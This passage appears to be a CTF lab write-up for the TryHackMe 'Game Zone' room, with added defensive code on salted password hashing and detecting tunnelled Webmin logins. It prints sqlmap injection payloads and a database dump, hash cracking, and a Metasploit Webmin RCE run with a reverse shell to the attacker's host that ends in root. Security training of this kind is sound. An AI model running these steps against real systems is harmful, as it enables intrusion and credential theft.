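    print(login_safe(db, "' or 1=1 -- -", ""))              # None
    print(search_vulnerable(db, "hitman%' AND 1=2 -- -"))   # []
    print(search_safe(db, "hitman"))                        # the Hitman 2 row
```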
------------------- SQLMAP
USING THE REQUEST WE CAPTURED WITH BURPSUITE WHEN USING THE MOVIE SEARCH FUNCTION IN OUR PANEL (ALREADY LOGGED IN THROUGH THE INJECTION WE TESTED BEFORE), WE NOW SAVE THAT LAST REQUEST TO A .TXT AND USE IT WITH SQLMAP TO LOOK FOR A VULNERABILITY AND, WITH --dump, TRY TO BUILD A TABLE FROM THE VULNERABLE DATABASE:
┌──(root㉿kali)-[~]
└─# sqlmap -r requestsearch.txt --dbms=mysql --dump
sqlmap {1.6.10#stable} https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:57:55 /2024-01-30/
[23:57:55] [INFO] parsing HTTP request from 'requestsearch.txt'
[23:57:57] [INFO] testing connection to the target URL
[23:57:57] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:57:57] [INFO] testing if the target URL content is stable
[23:57:57] [INFO] target URL content is stable
[23:57:57] [INFO] testing if POST parameter 'searchitem' is dynamic
[23:57:57] [INFO] POST parameter 'searchitem' appears to be dynamic
[23:57:57] [INFO] heuristic (basic) test shows that POST parameter 'searchitem' might be injectable (possible DBMS: 'MySQL')
[23:57:57] [INFO] heuristic (XSS) test shows that POST parameter 'searchitem' might be vulnerable to cross-site scripting (XSS) attacks
[23:57:57] [INFO] testing for SQL injection on POST parameter 'searchitem'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[23:59:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:59:29] [WARNING] reflective value(s) found and filtering out
[23:59:29] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[23:59:29] [INFO] testing 'Generic inline queries'
[23:59:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[23:59:29] [INFO] POST parameter 'searchitem' appears to be 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --string="not")
[23:59:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[23:59:29] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[23:59:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[23:59:29] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[23:59:29] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[23:59:29] [INFO] POST parameter 'searchitem' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable
[23:59:29] [INFO] testing 'MySQL inline queries'
[23:59:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[23:59:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[23:59:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[23:59:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[23:59:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[23:59:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[23:59:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[23:59:39] [INFO] POST parameter 'searchitem' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[23:59:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:59:39] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[23:59:39] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:59:39] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[23:59:39] [INFO] target URL appears to have 3 columns in query
[23:59:39] [INFO] POST parameter 'searchitem' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'searchitem' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: searchitem (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: searchitem=hitman%' AND 5050=5050#
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: searchitem=hitman%' AND GTID_SUBSET(CONCAT(0x716a706271,(SELECT (ELT(9106=9106,1))),0x7176716a71),9106) AND 'fGyw%'='fGyw
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchitem=hitman%' AND (SELECT 1949 FROM (SELECT(SLEEP(5)))KSbe) AND 'FKVI%'='FKVI
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: searchitem=hitman%' UNION ALL SELECT NULL,NULL,CONCAT(0x716a706271,0x65764443656343714f465170737a645670747a6677504f4243565a4353756b6e7a4651547a6b706c,0x7176716a71)#
---
[00:01:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.6
[00:01:26] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[00:01:26] [INFO] fetching current database
[00:01:26] [INFO] fetching tables for database: 'db'
[00:01:26] [INFO] fetching columns for table 'post' in database 'db'
[00:01:26] [INFO] fetching entries for table 'post' in database 'db'
Database: db
Table: post
[5 entries]
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | name | description |
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1 | Mortal Kombat 11 | Its a rare fighting game that hits just about every note as strongly as Mortal Kombat 11 does. Everything from its methodical and deep combat. |
| 2 | Marvel Ultimate Alliance 3 | Switch owners will find plenty of content to chew through, particularly with friends, and while it may be the gaming equivalent to a Hulk Smash, that isnt to say that it isnt a rollicking good time. |
| 3 | SWBF2 2005 | Best game ever |
| 4 | Hitman 2 | Hitman 2 doesnt add much of note to the structure of its predecessor and thus feels more like Hitman 1.5 than a full-blown sequel. But thats not a bad thing. |
| 5 | Call of Duty: Modern Warfare 2 | When you look at the total package, Call of Duty: Modern Warfare 2 is hands-down one of the best first-person shooters out there, and a truly amazing offering across any system. |
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
[00:01:26] [INFO] table 'db.post' dumped to CSV file '/root/.local/share/sqlmap/output/10.10.125.35/dump/db/post.csv'
[00:01:26] [INFO] fetching columns for table 'users' in database 'db'
[00:01:26] [INFO] fetching entries for table 'users' in database 'db'
[00:01:26] [INFO] recognized possible password hashes in column 'pwd'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[00:02:50] [INFO] writing hashes to a temporary file '/tmp/sqlmap56f88_r932566/sqlmaphashes-d5tvvw2y.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[00:04:06] [INFO] using hash method 'sha256_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[00:04:33] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[00:05:42] [INFO] starting dictionary-based cracking (sha256_generic_passwd)
[00:05:42] [INFO] starting 2 processes
[00:06:02] [INFO] using suffix '1'
[00:06:24] [INFO] using suffix '123'
[00:06:45] [INFO] using suffix '2'
[00:07:06] [INFO] using suffix '12'
[00:07:27] [INFO] using suffix '3'
[00:07:48] [INFO] using suffix '13'
[00:08:09] [INFO] using suffix '7'
[00:08:28] [INFO] using suffix '11'
[00:08:48] [INFO] using suffix '5'
[00:09:10] [INFO] using suffix '22'
[00:09:30] [INFO] using suffix '23'
[00:09:50] [INFO] using suffix '01'
[00:10:10] [INFO] using suffix '4'
[00:10:30] [INFO] using suffix '07'
[00:10:51] [INFO] using suffix '21'
[00:11:12] [INFO] using suffix '14'
[00:11:33] [INFO] using suffix '10'
[00:11:54] [INFO] using suffix '06'
[00:12:15] [INFO] using suffix '08'
[00:12:36] [INFO] using suffix '8'
[00:12:58] [INFO] using suffix '15'
[00:13:19] [INFO] using suffix '69'
[00:13:40] [INFO] using suffix '16'
[00:14:00] [INFO] using suffix '6'
[00:14:21] [INFO] using suffix '18'
[00:14:41] [INFO] using suffix '!'
[00:15:01] [INFO] using suffix '.'
[00:15:22] [INFO] using suffix '*'
[00:15:42] [INFO] using suffix '!!'
[00:16:04] [INFO] using suffix '?'
[00:16:25] [INFO] using suffix ';'
[00:16:46] [INFO] using suffix '..'
[00:17:07] [INFO] using suffix '!!!'
[00:17:28] [INFO] using suffix ', '
[00:17:49] [INFO] using suffix '@'
[00:18:10] [WARNING] no clear password(s) found
Database: db
Table: users
[1 entry]
+------------------------------------------------------------------+----------+
| pwd | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47 |
+------------------------------------------------------------------+----------+
[00:18:10] [INFO] table 'db.users' dumped to CSV file '/root/.local/share/sqlmap/output/10.10.125.35/dump/db/users.csv'
[00:18:10] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.125.35'
[00:18:10] [WARNING] your sqlmap version is outdated
[*] ending @ 00:18:10 /2024-01-31/
THE PROMPTS SQLMAP ASKED US DURING THE PROCESS, EXPLAINED BY GPT:
What is it asking me here?: for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
ChatGPT
The prompt is asking whether you want to include all the remaining tests for MySQL, keeping the provided level and risk values. You can answer "Y" to include all the remaining tests with the same level and risk. If you prefer to customise the levels or exclude some tests, you can answer "n" and provide further instructions.
User
And here, what is it telling me now?: POST parameter 'searchitem' is vulnerable. Do you want to keep testing the others (if any)?
ChatGPT
The statement indicates that the POST parameter called 'searchitem' is vulnerable. The associated question is whether you want to continue testing the other parameters (if any). You can answer according to your needs and the nature of your security tests.
If you are running vulnerability tests and want to keep evaluating the other parameters for possible vulnerabilities, you can answer affirmatively ("yes" or "Y").
If you have already identified and addressed the vulnerability in 'searchitem' and do not need to evaluate other parameters, you can answer negatively ("no" or "n").
Remember that the decision to continue or stop testing will depend on your context and the specific goals of your security assessment.
User
Perfect, yes, I am studying this on tryhackme. Look, what is this question asking me now?: do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
ChatGPT
The question is asking whether you want to store the hashes in a temporary file for later processing with other tools. You can answer as follows:
If you want to store the hashes in a temporary file for possible further processing with other tools, you can answer "y" or "Y" (yes).
If you do not want to store the hashes and prefer to skip saving them to a temporary file, you can answer "n" or "N" (no).
The choice will depend on your goals and the workflow you are following in your studies or tests.
User
Look, I saved it to a file and now it asks me this?: do you want to crack them via a dictionary-based attack? [Y/n/q]
ChatGPT
The question is asking whether you want to try to crack the hashes using a dictionary-based attack. Here are the options:
If you want to try to crack the hashes with a dictionary-based attack, you can answer "Y" (yes).
If you do not want to run a dictionary-based attack and prefer to skip this step, you can answer "n" (no).
If you decide to abandon the task altogether, you can answer "q" (short for quit).
The choice will depend on your goals and the approach you are following in your studies or tests. If you are interested in trying to crack the hashes using a wordlist, choose "Y". Otherwise, if you are not interested in this particular step, you can choose "n".
User
And now?: do you want to use common password suffixes? (slow!) [y/N]
ChatGPT
The question is asking whether you want to use common password suffixes in the attempt to crack the hashes. Note that this option can make the process slower. Here are the options:
If you want to use common password suffixes and are willing to accept the possible slowdown, you can answer "y" (yes).
If you do not want to use common password suffixes and prefer a faster process, you can answer "n" (no).
The choice will depend on your goals and the level of thoroughness you are looking for in your tests. If you are willing to wait a little longer to try a wider range of possible passwords, choose "y". If you prefer a faster run and are satisfied with the standard wordlist, choose "n".
WE READ THE TXT FILE THAT SQLMAP SAVED FROM THE VULNERABLE DATABASE:
┌──(root㉿kali)-[~]
└─# cat /tmp/sqlmap56f88_r932566/sqlmaphashes-d5tvvw2y.txt
agent47:ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
AND BINGO, WE ALSO CRACKED THE AGENT47 USER'S HASH; THE CRACKSTATION PAGE GAVE US THIS:
Free Password Hash Cracker
Enter up to 20 non-salted hashes, one per line:
ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
Supports: LM, NTLM, md2, md4, md5, md5(md5_hex), md5-half, sha1, sha224, sha256, sha384, sha512, ripeMD160, whirlpool, MySQL 4.1+ (sha1(sha1_bin)), QubesV3.1BackupDefaults
Hash Type Result
ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 sha256 videogamer124
PASSWORD: videogamer124
AGENT47:videogamer124
---------- JOHN THE RIPPER
WE COULD ALSO CRACK THE SHA-256 HASH WITH JOHN THE RIPPER:
┌──(root㉿kali)-[~]
└─# john hashagent47.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 256/256 AVX2 8x])
Warning: poor OpenMP scalability for this hash type, consider --fork=2
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124 (agent47)
1g 0:00:00:01 DONE (2024-01-31 00:35) 0.5617g/s 1638Kp/s 1638Kc/s 1638KC/s vimivi..veluca
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed.
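Added example, not code from the original writeup, covering both the CrackStation lookup and the john run above: it reproduces why the dumped hash falls to either tool (plain SHA-256 with no salt is deterministic, so a precomputed table or a wordlist pass finds it) and shows a salted, iterated PBKDF2 record as the storage that would have resisted them. The hash and password are the ones on the page; the five-word wordlist is a constructed stand-in for rockyou.txt.

```python
"""
Added example (not from the original writeup): why the dumped hash cracks and what
would have resisted it. DUMPED_HASH and the password come from the page; the
wordlist is a constructed stand-in for rockyou.txt.
"""
import hashlib
import hmac
import os

DUMPED_HASH = "ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14"
WORDLIST = ["password", "hitman47", "videogamer", "videogamer124", "gamezone"]


def unsalted_sha256(password):
    """Storage scheme the dump implies (sqlmap: 'sha256_generic_passwd'): one fast
    hash, no salt, so equal passwords always give equal digests."""
    return hashlib.sha256(password.encode()).hexdigest()


def dictionary_check(target_hex, words):
    """What CrackStation's table and john's wordlist mode boil down to: hash each
    candidate and compare. Returns the matching word or None."""
    for word in words:
        if unsalted_sha256(word) == target_hex:
            return word
    return None


def pbkdf2_store(password, iterations=600_000):
    """Hardened storage: random 16-byte salt plus an iterated KDF. The same
    password yields a different record every time, so precomputed lookups fail
    and every guess costs `iterations` hash rounds."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password, record):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iters, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def salted_roundtrip(password, iterations=600_000):
    """Store the same password twice and verify against the first record. Returns
    (records_differ, correct_password_accepted, wrong_password_rejected)."""
    rec1 = pbkdf2_store(password, iterations)
    rec2 = pbkdf2_store(password, iterations)
    return (rec1 != rec2,
            pbkdf2_verify(password, rec1),
            not pbkdf2_verify(password + "x", rec1))


if __name__ == "__main__":
    print(unsalted_sha256("videogamer124") == DUMPED_HASH)  # True
    print(dictionary_check(DUMPED_HASH, WORDLIST))          # videogamer124
    print(salted_roundtrip("videogamer124", 20_000))        # (True, True, True)
```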
------------- SSH CONNECTION
WE TRY TO CONNECT OVER SSH WITH THE AGENT47 USER'S CREDENTIALS, AND BINGO, IT WORKED AND WE GOT THE USER FLAG:
┌──(root㉿kali)-[~]
└─# ssh agent47@10.10.125.35
The authenticity of host '10.10.125.35 (10.10.125.35)' can't be established.
ED25519 key fingerprint is SHA256:CyJgMM67uFKDbNbKyUM0DexcI+LWun63SGLfBvqQcLA.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.125.35' (ED25519) to the list of known hosts.
agent47@10.10.125.35's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
109 packages can be updated.
68 updates are security updates.
Last login: Fri Aug 16 17:52:04 2019 from 192.168.1.147
agent47@gamezone:~$ ls
user.txt
agent47@gamezone:~$ cat user.txt
649ac17b1480ac13ef1e4fa579dac95c
agent47@gamezone:~$ sudo -l
[sudo] password for agent47:
Sorry, user agent47 may not run sudo on gamezone.
agent47@gamezone:~$ pwd
/home/agent47
--------- WE KEEP INVESTIGATING SOCKET CONNECTIONS ON THE VICTIM MACHINE WITH SS
agent47@gamezone:~$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 *:10000 *:*
udp UNCONN 0 0 *:68 *:*
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 128 *:10000 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 128 :::22 :::*
------- BROWSER: WE CHECK THE SERVICE SHOWN ON PORT 10000, BLOCKED BY THE FIREWALL
http://10.10.125.35:10000/
No se puede acceder a este sitio10.10.125.35 rechazó la conexión.
Intenta:
Comprobar la conexión.
Comprobar el proxy y el firewall.
ERR_CONNECTION_REFUSED
---------------SSH -L: EXPOSING THE SERVER ON PORT 10000 FROM OUR ATTACKING MACHINE
┌──(root㉿kali)-[~]
└─# ssh -L 10000:localhost:10000 agent47@10.10.125.35
agent47@10.10.125.35's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
109 packages can be updated.
68 updates are security updates.
Last login: Tue Jan 30 18:37:59 2024 from 10.10.14.223
IN THE BROWSER WE SEE THE CMS NAME AND VERSION:
http://localhost:10000/
Login to Webmin
You must enter a username and password to login to the Webmin server on localhost.
Username
Password
Remember login permanently?
WE ENTER THE AGENT47 USER'S CREDENTIALS AND GET TO SEE THE WEBMIN VERSION:
System hostname gamezone (127.0.1.1)
Operating system Ubuntu Linux 16.04.6
Webmin version 1.580
Time on system Tue Jan 30 19:23:25 2024
Kernel and CPU Linux 4.4.0-159-generic on x86_64
Processor information Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz, 1 cores
System uptime 2 hours, 49 minutes
Running processes 127
CPU load averages 0.00 (1 min) 0.00 (5 mins) 0.00 (15 mins)
CPU usage 0% user, 0% kernel, 0% IO, 100% idle
Real memory 1.95 GB total, 303.78 MB used
Virtual memory 975 MB total, 0 bytes used
Local disk space 8.78 GB total, 2.82 GB used
Package updates All installed packages are up to date
-------- METASPLOIT
NOW THAT WE HAVE THE VERSION, WE SEARCH FOR AN EXPLOIT IN METASPLOIT AND CONFIGURE IT:
┌──(root㉿kali)-[~]
└─# msfconsole
=[ metasploit v6.2.23-dev ]
+ -- --=[ 2259 exploits - 1188 auxiliary - 402 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Writing a custom module? After editing your
module, why not try the reload command
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use exploit/linux/http/webmin_packageup_rce
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_packageup_rce) > search webmin 1.580
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution
1 auxiliary/admin/webmin/edit_html_fileaccess 2012-09-06 normal No Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/admin/webmin/edit_html_fileaccess
msf6 > use 0
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > options
Module options (exploit/unix/webapp/webmin_show_cgi_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 10000 yes The target port (TCP)
SSL true yes Use SSL
USERNAME yes Webmin Username
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Webmin 1.580
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set RHOSTS 10.10.182.25
RHOSTS => 10.10.182.25
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set USERNAME agent47
USERNAME => agent47
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set PASSWORD videogamer124
PASSWORD => videogamer124
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > options
Module options (exploit/unix/webapp/webmin_show_cgi_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD videogamer124 yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.182.25 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 10000 yes The target port (TCP)
SSL true yes Use SSL
USERNAME agent47 yes Webmin Username
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Webmin 1.580
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
1 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
2 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
3 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
4 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
5 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
6 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
7 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
8 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
9 payload/cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
10 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
11 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
12 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set PAYLOAD payload/cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > options
Module options (exploit/unix/webapp/webmin_show_cgi_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD videogamer124 yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS http://localhost:10000/ yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 10000 yes The target port (TCP)
SSL true yes Use SSL
USERNAME agent47 yes Webmin Username
VHOST localhost no HTTP server virtual host
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.239.42 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Webmin 1.580
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > run
[*] Exploiting target 0.0.0.1
[*] Started reverse TCP double handler on 10.10.239.42:4444
[*] Attempting to login...
[-] Authentication failed
[*] Exploiting target 127.0.0.1
[*] Started reverse TCP double handler on 10.10.239.42:4444
[*] Attempting to login...
[+] Authentication successful
[+] Authentication successful
[*] Attempting to execute the payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] Payload executed successfully
[*] Command: echo kTjlTWHl6TOqraNd;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "kTjlTWHl6TOqraNd\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.239.42:4444 -> 10.10.182.25:38846) at 2024-01-31 23:05:52 +0000
[*] Session 1 created in the background.
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.10.239.42:4444 -> 10.10.182.25:38846 (127.0.0.1)
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > sessions -i 1
[*] Starting interaction with 1...
ls
ACLEditor.class
ACLEntry.class
ACLWindow.class
AttributeEditor.class
AttributesWindow.class
BorderPanel.class
BorderPanel.java
CHANGELOG
CbButton.class
CbButton.java
CbButtonCallback.class
CbButtonGroup.class
CbColorButton.class
CbColorButton.java
CbColorWindow.class
CbColorWindow.java
CbColorWindowCallback.class
CbColorWindowCube.class
CbColorWindowSwatch.class
CbImageChooser.class
CbImageChooser.java
CbImageFileWindow.class
CbScrollbar.class
CbScrollbar.java
CbScrollbarArrow.class
CbScrollbarCallback.class
CbSlider.class
CbSlider.java
CbSliderCallback.class
ContentsWindow.class
DFSAdminExport.class
DeleteWindow.class
DownloadDirWindow.class
EXTWindow.class
EditorWindow.class
ErrorWindow.class
ErrorWindow.java
ExtractWindow.class
FileAttribute.class
FileManager.class
FileManager.java
FileNode.class
FileSystem.class
FindReplaceWindow.class
FixedFrame.class
FixedFrame.java
GotoWindow.class
GrayPanel.class
GrayPanel.java
Hierarchy.class
Hierarchy.java
HierarchyCallback.class
HierarchyNode.class
HistoryWindow.class
ImagePanel.class
LinedPanel.class
LinedPanel.java
LinkWindow.class
LinuxExport.class
Makefile
MkdirWindow.class
MountWindow.class
MultiColumn.class
MultiColumn.java
MultiColumnCallback.class
MultiLabel.class
OverwriteWindow.class
PermissionsPanel.class
PreviewWindow.class
PropertiesWindow.class
QuickSort.class
QuickSort.java
RemoteFile.class
RenameWindow.class
ResizePanel.class
ResizePanel.java
SambaShare.class
ScrollImage.class
SearchWindow.class
SharingWindow.class
StaticTextField.class
StaticTextField.java
StringJoiner.class
StringSplitter.class
StringSplitter.java
TabSelector.class
TabbedDisplayPanel.class
TabbedPanel.class
TabbedPanel.java
ToolbarLayout.class
ToolbarLayout.java
Util.class
Util.java
acl_security.pl
cgi_args.pl
chmod.cgi
config
config-*-linux
config-freebsd
config-irix
config-solaris
config.info
config.info.ca
config.info.cz
config.info.cz.UTF-8
config.info.de
config.info.el
config.info.es
config.info.fa
config.info.it
config.info.ko_KR.UTF-8
config.info.ko_KR.euc
config.info.nl
config.info.no
config.info.tr
contents.cgi
copy.cgi
defaultacl
delete.cgi
edit_html.cgi
extract.cgi
file-lib.pl
file.jar
filesystems.cgi
getattrs.cgi
getext.cgi
getfacl.cgi
images
index.cgi
irix-getfacl.pl
irix-setfacl.pl
lang
lang.cgi
list.cgi
list_exports.cgi
list_shares.cgi
log_parser.pl
makelink.cgi
mkdir.cgi
module.info
mount.cgi
move.cgi
preview.cgi
rename.cgi
root.cgi
save.cgi
save_export.cgi
save_html.cgi
save_share.cgi
search.cgi
setattrs.cgi
setext.cgi
setfacl.cgi
show.cgi
size.cgi
unicode
unicode.pl
upform.cgi
upload.cgi
upload2.cgi
xinha
whoami
root
BINGO. WITH THE SELECTED EXPLOIT, USING AS RHOST THE LOCALHOST TUNNEL WE SET UP FROM OUR OWN MACHINE (THE ONE THROUGH WHICH WE SAW THE WEBMIN VERSION) AND THE PAYLOAD WE CHOSE, WE RAN IT AND, AS SEEN ABOVE, IT AUTHENTICATED AND CONNECTED AS ROOT, OBTAINING THE FLAG:
cd root
ls
root.txt
cat root.txt
a4b945830144bdd71908d12d902adeee
pwd
/root
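From the defender's side, the detail that made the exploit work is worth a detection: Webmin was bound to localhost, so every request the attacker sent arrived from 127.0.0.1 through the SSH tunnel, under a user that also had an open SSH session at that moment, and one of those requests hit /file/show.cgi. The script below is an added example, not part of the original writeup and not a Webmin or Metasploit component. It correlates sshd lines from auth.log (real syslog format) with Webmin miniserv.log access lines. The miniserv.log layout (common log format with the Webmin username as the third field), the year for syslog timestamps, and all sample lines are assumptions or constructed data, so check the regexes against your own log files before relying on them.

```python
"""Flag Webmin requests that arrive over the loopback interface while the same
user holds an SSH session (the shape of an SSH port-forwarded login), and any
request to /file/show.cgi.  Added example with constructed sample logs."""
import re
from datetime import datetime, timezone

# Constructed sample data: sshd lines in real syslog format.
AUTH_LOG = """\
Jan 31 22:58:03 gamezone sshd[1201]: Accepted password for agent47 from 10.10.239.42 port 51122 ssh2
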